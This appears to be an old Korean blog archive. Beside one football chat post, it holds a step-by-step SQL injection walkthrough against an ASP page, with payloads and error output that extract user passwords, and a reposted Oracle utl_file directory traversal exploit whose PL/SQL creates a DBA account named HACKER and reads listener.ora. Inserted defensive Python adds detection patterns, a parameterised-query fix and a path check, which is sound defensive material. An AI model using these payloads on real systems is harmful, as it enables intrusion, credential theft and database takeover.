

2012/05/15 13:24

The difference between Shinji Kagawa and Park Ji-sung (chat)

lol, it leaves you speechless... I wonder where Bench-sung will transfer to



Source: http://gall.dcinside.com/list.php?id=football_new4&no=2653777

2012/05/14 15:37

SQLi play (SQL-Injection)

Source code vulnerable to SQL injection


1. Find the number of columns in the table related to the id parameter value
http://localhost/web/id_search.asp?id='+order+by+1-- (true)
http://localhost/web/id_search.asp?id='+order+by+5-- (true)
http://localhost/web/id_search.asp?id='+order+by+10-- (true)
http://localhost/web/id_search.asp?id='+order+by+11-- (false)
Error format:
Microsoft OLE DB Provider for SQL Server (0x80040E14)
The ORDER BY position number 11 is out of range of the number of items in the select list.
/web/id_search.asp, line 8

So the related table has 10 columns

2. Obtain the table name and column names using HAVING
http://localhost/web/id_search.asp?id='+having+1=1--
Error format:
Microsoft OLE DB Provider for SQL Server (0x80040E14)
Column 'member.id' is invalid in the select list because it is not contained in an aggregate function and there is no GROUP BY clause.
/web/id_search.asp, line 8

http://localhost/web/id_search.asp?id='+group+by+member.id+having+1=1--
Error format:
Microsoft OLE DB Provider for SQL Server (0x80040E14)
Column 'member.user_id' is invalid in the select list because it is not contained in either an aggregate function or the GROUP BY clause.
/web/id_search.asp, line 8

http://localhost/web/id_search.asp?id='+group+by+member.id,member.user_id+having+1=1--
Error format:
Microsoft OLE DB Provider for SQL Server (0x80040E14)
Column 'member.name' is invalid in the select list because it is not contained in either an aggregate function or the GROUP BY clause.
/web/id_search.asp, line 8

http://localhost/web/id_search.asp?id='+group+by+member.id,member.user_id,member.name+having+1=1--
Error format:
Microsoft OLE DB Provider for SQL Server (0x80040E14)
Column 'member.user_pw' is invalid in the select list because it is not contained in either an aggregate function or the GROUP BY clause.
/web/id_search.asp, line 8

http://localhost/web/id_search.asp?id='+group+by+member.id,member.user_id,member.name,member.user_pw+having+1=1--
Error format:
Microsoft OLE DB Provider for SQL Server (0x80040E14)
Column 'member.nickname' is invalid in the select list because it is not contained in either an aggregate function or the GROUP BY clause.
/web/id_search.asp, line 8

http://localhost/web/id_search.asp?id='+group+by+member.id,member.user_id,member.name,member.user_pw,member.nickname+having+1=1--
Error format:
Microsoft OLE DB Provider for SQL Server (0x80040E14)
Column 'member.zipcode' is invalid in the select list because it is not contained in either an aggregate function or the GROUP BY clause.
/web/id_search.asp, line 8

http://localhost/web/id_search.asp?id='+group+by+member.id,member.user_id,member.name,member.user_pw,member.nickname,member.zipcode+having+1=1--
Error format:
Microsoft OLE DB Provider for SQL Server (0x80040E14)
Column 'member.address1' is invalid in the select list because it is not contained in either an aggregate function or the GROUP BY clause.
/web/id_search.asp, line 8

3. Obtain the column value types using UNION (this gives the attacker what is needed to construct a complete INSERT statement)
http://localhost/web/id_search.asp?id='+union+select+sum(user_id)+from+member--
Error format:
Microsoft OLE DB Provider for SQL Server (0x80040E07)
The sum or average aggregate operation cannot take a varchar data type as an argument.
/web/id_search.asp, line 8

http://localhost/web/id_search.asp?id='+union+select+sum(id)+from+member--
Error format:
Microsoft OLE DB Provider for SQL Server (0x80040E14)
All queries in an SQL statement containing a UNION operator must have an equal number of expressions in their target lists.
/web/id_search.asp, line 8
This error appears when the column's data type is numeric: sum() itself is accepted, so the only complaint is the column-count mismatch of the UNION

http://localhost/web/id_search.asp?id='+union+select+sum(user_pw)+from+member--
Error format:
Microsoft OLE DB Provider for SQL Server (0x80040E07)
The sum or average aggregate operation cannot take a varchar data type as an argument.
/web/id_search.asp, line 8

4. Extract field values using UNION
http://localhost/web/id_search.asp?id='+union+select+1,2,3,4,5,6,7,8,9,10+from+member--


http://localhost/web/id_search.asp?id='+union+select+1,@@version,3,4,5,6,7,8,9,10+from+member--


http://localhost/web/id_search.asp?id='+union+select+1,user_id,3,4,5,6,7,8,9,10+from+member--


http://localhost/web/id_search.asp?id='+union+select+1,user_pw,3,4,5,6,7,8,9,10+from+member+where+user_id='test'--


http://localhost/web/id_search.asp?id='+union+select+min(user_id),1,2,3,4,5,6,7,8,9+from+member+where+user_id+>+'a'--
Error format:
Microsoft OLE DB Provider for SQL Server (0x80040E07)
Syntax error converting the varchar value 'apple' to a column of data type int.
/web/id_search.asp, line 8

http://localhost/web/id_search.asp?id='+union+select+min(user_id),1,2,3,4,5,6,7,8,9+from+member+where+user_id+>+'apple'--
Error format:
Microsoft OLE DB Provider for SQL Server (0x80040E07)
Syntax error converting the varchar value 'test' to a column of data type int.
/web/id_search.asp, line 8

http://localhost/web/id_search.asp?id='+union+select+min(user_id),1,2,3,4,5,6,7,8,9+from+member+where+user_id+>+'test'--
Error format:
Microsoft OLE DB Provider for SQL Server (0x80040E07)
Syntax error converting the varchar value 'totoriverce' to a column of data type int.
/web/id_search.asp, line 8

http://localhost/web/id_search.asp?id='+union+select+min(user_id),1,2,3,4,5,6,7,8,9+from+member+where+user_id+>+'totoriverce'--
No more rows
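Every probe in steps 1 to 4 leaves two traces a defender can key on: the request itself (ORDER BY / HAVING / UNION SELECT fragments in the id parameter) and the verbose OLE DB error that the page returns. The following detection script is an added example, not part of the original post; the log lines and the "METHOD URL STATUS" log shape are constructed here, and the error messages are the ones quoted above.

```python
import re
from urllib.parse import unquote_plus, urlsplit

# Constructed access-log lines in a simplified "METHOD URL STATUS" shape; the
# requests mirror the probes shown above against the demo page id_search.asp.
SAMPLE_LOG = """\
GET /web/id_search.asp?id=test 200
GET /web/id_search.asp?id='+order+by+11-- 500
GET /web/id_search.asp?id='+group+by+member.id+having+1=1-- 500
GET /web/id_search.asp?id='+union+select+1,@@version,3,4,5,6,7,8,9,10+from+member-- 200
GET /web/id_search.asp?id=';drop+table+foo-- 200
GET /web/index.asp 200
"""

# Constructed application error log: the OLE DB provider messages quoted on the page,
# plus one unrelated ASP error that must not trigger.
SAMPLE_ERRORS = """\
Microsoft OLE DB Provider for SQL Server (0x80040E14) The ORDER BY position number 11 is out of range of the number of items in the select list.
Microsoft OLE DB Provider for SQL Server (0x80040E14) Column 'member.id' is invalid in the select list because it is not contained in an aggregate function and there is no GROUP BY clause.
Microsoft OLE DB Provider for SQL Server (0x80040E07) Syntax error converting the varchar value 'apple' to a column of data type int.
Object required: 'objConn'
"""

# Request-side indicators, matched against the URL-decoded query string.
REQUEST_PATTERNS = {
    "order_by_probe": re.compile(r"'\s*order\s+by\s+\d+", re.I),
    "having_probe":   re.compile(r"\bhaving\s+1\s*=\s*1", re.I),
    "union_select":   re.compile(r"\bunion\s+select\b", re.I),
    "version_read":   re.compile(r"@@version", re.I),
    "stacked_ddl":    re.compile(r";\s*(drop|create|alter)\s+table\b", re.I),
}

# Response-side indicators: error-based injection only works because these
# messages reach the client, so seeing them in the error log is itself a signal.
ERROR_PATTERNS = {
    "orderby_range":  re.compile(r"ORDER BY position number \d+ is out of range"),
    "groupby_leak":   re.compile(r"Column '[^']+' is invalid in the select list"),
    "union_mismatch": re.compile(r"UNION operator must have an equal number"),
    "cast_leak":      re.compile(r"converting the varchar value '[^']*' to a column of data type int"),
}

def inspect_request(line):
    """Return the indicator names that fire on one access-log line."""
    parts = line.split()
    if len(parts) < 2:
        return []
    # '+' becomes a space and %xx escapes are decoded, so obfuscated spacing is normalised
    query = unquote_plus(urlsplit(parts[1]).query)
    return [name for name, rx in REQUEST_PATTERNS.items() if rx.search(query)]

def inspect_error(line):
    """Return the indicator names that fire on one error-log line."""
    return [name for name, rx in ERROR_PATTERNS.items() if rx.search(line)]

def scan(log_text, inspector):
    """Return (line, indicators) for every line on which at least one indicator fires."""
    hits = []
    for line in log_text.splitlines():
        found = inspector(line)
        if found:
            hits.append((line, found))
    return hits

if __name__ == "__main__":
    for line, found in scan(SAMPLE_LOG, inspect_request):
        print("REQUEST", found, line)
    for line, found in scan(SAMPLE_ERRORS, inspect_error):
        print("ERROR  ", found, line)
```

The request patterns are deliberately narrow (a quote followed by ORDER BY, HAVING 1=1, UNION SELECT) so that legitimate searches containing the word "union" do not fire; the error patterns are the stronger signal, because a correctly written page never returns these provider messages to a browser at all.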

※ Transact-SQL (exposes the information on a single line, like MySQL's concat)
http://localhost/web/id_search.asp?id=';begin+declare+@ret+varchar(8000)+set+@ret=':'+select+@ret=@ret+''+user_id+'/'+user_pw+from+member+where+user_id>@ret+select+@ret+as+ret+into+foo+end--


http://localhost/web/id_search.asp?id='+union+select+1,ret,3,4,5,6,7,8,9,10+from+foo--


Delete the created table (foo)
http://localhost/web/id_search.asp?id=';drop+table+foo--

Reference: http://lael.be/84
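The whole chain above depends on one defect in id_search.asp: the id parameter is pasted into the SQL text, so the leading quote closes the literal and everything after it is parsed as SQL. The following is an added example (not the page's ASP source, which is not shown) that reproduces that shape against an in-memory SQLite stand-in for the member table and runs the same payloads through a parameterised version of the query; the table layout, the row values and the assumption that the original query compared a quoted user_id are constructed here.

```python
import sqlite3

# Constructed in-memory stand-in for the page's `member` table, narrowed to four
# columns (the demo table had ten). The user_ids are the ones the page enumerates.
def make_db():
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE member (id INTEGER, user_id TEXT, name TEXT, user_pw TEXT)")
    conn.executemany("INSERT INTO member VALUES (?, ?, ?, ?)", [
        (1, "apple", "Apple", "pw-apple"),
        (2, "test", "Test", "pw-test"),
        (3, "totoriverce", "Toto", "pw-toto"),
    ])
    return conn

def search_vulnerable(conn, user_input):
    """Assumed shape of id_search.asp: the parameter is concatenated into the SQL text."""
    sql = "SELECT id, user_id, name FROM member WHERE user_id = '" + user_input + "'"
    try:
        return {"rows": conn.execute(sql).fetchall(), "error": None}
    except sqlite3.Error as exc:
        # Returning the raw error text to the caller is what steps 1-3 above rely on.
        return {"rows": [], "error": str(exc)}

def search_safe(conn, user_input):
    """Same query with a bound parameter: the input is only ever a value, never SQL."""
    sql = "SELECT id, user_id, name FROM member WHERE user_id = ?"
    try:
        return {"rows": conn.execute(sql, (user_input,)).fetchall(), "error": None}
    except sqlite3.Error as exc:
        return {"rows": [], "error": str(exc)}

# The payloads from the write-up, scaled to a three-column SELECT list.
PAYLOADS = {
    "order_by_in_range":  "' order by 3--",
    "order_by_out_range": "' order by 4--",
    "union_dump":         "' union select 1,user_pw,3 from member--",
}

def compare(conn=None):
    """Run every payload through both versions; returns {name: (vulnerable_result, safe_result)}."""
    conn = conn or make_db()
    return {name: (search_vulnerable(conn, p), search_safe(conn, p))
            for name, p in PAYLOADS.items()}

if __name__ == "__main__":
    for name, (vuln, safe) in compare().items():
        print(f"{name:20s} vulnerable -> rows={len(vuln['rows'])} error={vuln['error']!r}")
        print(f"{'':20s} safe       -> rows={len(safe['rows'])} error={safe['error']!r}")
```

On the vulnerable form, "order by 4" raises an out-of-range error while "order by 3" does not, which is exactly the column-count oracle of step 1, and the UNION payload returns every user_pw. On the parameterised form all three payloads are compared as literal strings against user_id, match nothing and raise nothing, so neither the error channel nor the UNION channel exists.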


2012/05/10 17:14

[Exploit] Oracle Exploit Directory Traversal via utl_file (DB security)

Source: http://www.red-database-security.com/exploits/oracle-directory-traversal-via-utl_file.html

Oracle Exploit Directory Traversal via utl_file


Name                 Oracle Directory Traversal via utl_file
Vulnerable versions  Oracle 8 / 8i / 9i
Severity             Medium Risk
Category             Directory Traversal
Vendor URL           http://www.oracle.com/
Credit               Cesar Cerrudo / Pete Finnigan
Exploit              http://www.argeniss.com
Date                 05 May 2005 (V 1.00)
 
Details
By using directory traversal it is possible to read, write and rename files on the database server, for example to:
become DBA (via glogin.sql / login.sql)
read passwords (e.g. mod_plsql, listener.ora)
This only works if the database version accepts the ..\ syntax.

Vulnerable when "utl_file_dir=*" is set as an init.ora parameter or PUBLIC holds the "CREATE ANY DIRECTORY" privilege

Example
--Create a file mytextfile.txt in the same directory referenced by MEDIA_DIR directory object.
declare
f utl_file.file_type;
begin
f:=UTL_FILE.FOPEN ('MEDIA_DIR','\\.\\..\\.\\..\\.\\..\\.\\..\\.\\..\\.\\glogin.sql','w',1000);
UTL_FILE.PUT_LINE (f,'CREATE USER HACKER IDENTIFIED BY HACKER;',TRUE);
UTL_FILE.PUT_LINE (f,'GRANT DBA TO HACKER;',TRUE);
UTL_FILE.FCLOSE(f);
end;

--Read arbitrary files in the same drive as the directory referenced by MEDIA_DIR directory object.
SET SERVEROUTPUT ON
declare
f utl_file.file_type;
sBuffer Varchar(8000);
begin
f:=UTL_FILE.FOPEN ('MEDIA_DIR','\\.\\..\\.\\..\\.\\..\\.\\..\\.\\..\\.\\oracle\ora92\network\ADMIN\listener.ora','r');
loop
UTL_FILE.GET_LINE (f,sBuffer);
DBMS_OUTPUT.PUT_LINE(sBuffer);
end loop;
EXCEPTION
when no_data_found then
UTL_FILE.FCLOSE(f);
end;

--Rename any file in the same drive as the directory referenced by MEDIA_DIR directory object
begin
UTL_FILE.frename('MEDIA_DIR','\\.\\..\\.\\..\\.\\myoldtextfile.txt','MEDIA_DIR','\\.\\..\\.\\..\\.\\mynewtextfile.txt',TRUE);
end;
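The three PL/SQL blocks work because the file name handed to UTL_FILE is appended to the directory object's path without being checked, so a name made of "\\.\\.." components climbs out of MEDIA_DIR to the drive root. The following Python is an added example, not Oracle's code and not from the advisory: it models Windows-style path joining on a component stack so the traversal string above can be traced to where it lands, and shows the check a file-access wrapper should apply (a bare file name only, and a resolved path that must stay inside the base). BASE_DIR is an assumed location for MEDIA_DIR.

```python
# Assumed location the MEDIA_DIR directory object points at (hypothetical value).
BASE_DIR = r"C:\oracle\media"

def resolve_windows_path(base_dir, requested):
    """Join base_dir and requested the way a naive file open would, then normalise
    '.', '..' and repeated separators on a component stack. Returns the final path."""
    drive, _, rest = base_dir.partition("\\")        # 'C:' and 'oracle\media'
    stack = [c for c in rest.split("\\") if c]
    for comp in requested.replace("/", "\\").split("\\"):
        if comp in ("", "."):
            continue                                 # empty parts come from the doubled '\\'
        if comp == "..":
            if stack:
                stack.pop()                          # climb one level, never above the drive root
            continue
        stack.append(comp)
    return drive + "\\" + "\\".join(stack)

def is_inside(base_dir, resolved):
    """True only if resolved is a descendant of base_dir (case-insensitive, as on Windows)."""
    base = base_dir.rstrip("\\") + "\\"
    return resolved.lower().startswith(base.lower())

def safe_file_name(base_dir, requested):
    """Return the path to open, or None if the request must be refused.
    The strict rule comes first: a request has to be a bare file name, no separators,
    no '.' or '..'. The containment check is kept as defence in depth."""
    if requested in ("", ".", "..") or "\\" in requested or "/" in requested:
        return None
    resolved = resolve_windows_path(base_dir, requested)
    return resolved if is_inside(base_dir, resolved) else None

# The traversal string from the first PL/SQL block above, exactly as written in the literal
# (PL/SQL does not treat backslash as an escape, so the doubled separators are literal).
TRAVERSAL = r"\\.\\..\\.\\..\\.\\..\\.\\..\\.\\..\\.\\glogin.sql"

if __name__ == "__main__":
    print(resolve_windows_path(BASE_DIR, TRAVERSAL))      # where the write would land
    print(safe_file_name(BASE_DIR, TRAVERSAL))            # None: rejected
    print(safe_file_name(BASE_DIR, "mytextfile.txt"))     # stays inside MEDIA_DIR
```

Tracing TRAVERSAL through resolve_windows_path shows the first two ".." components popping "media" and "oracle" and the remaining ones doing nothing at the drive root, so the write goes to C:\glogin.sql regardless of how deep MEDIA_DIR sits; the bare-name rule in safe_file_name rejects the request before any of that happens. The database-side controls named in the advisory (not setting utl_file_dir=*, not granting CREATE ANY DIRECTORY to PUBLIC) remain necessary, because this check only helps code that calls UTL_FILE through a wrapper.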
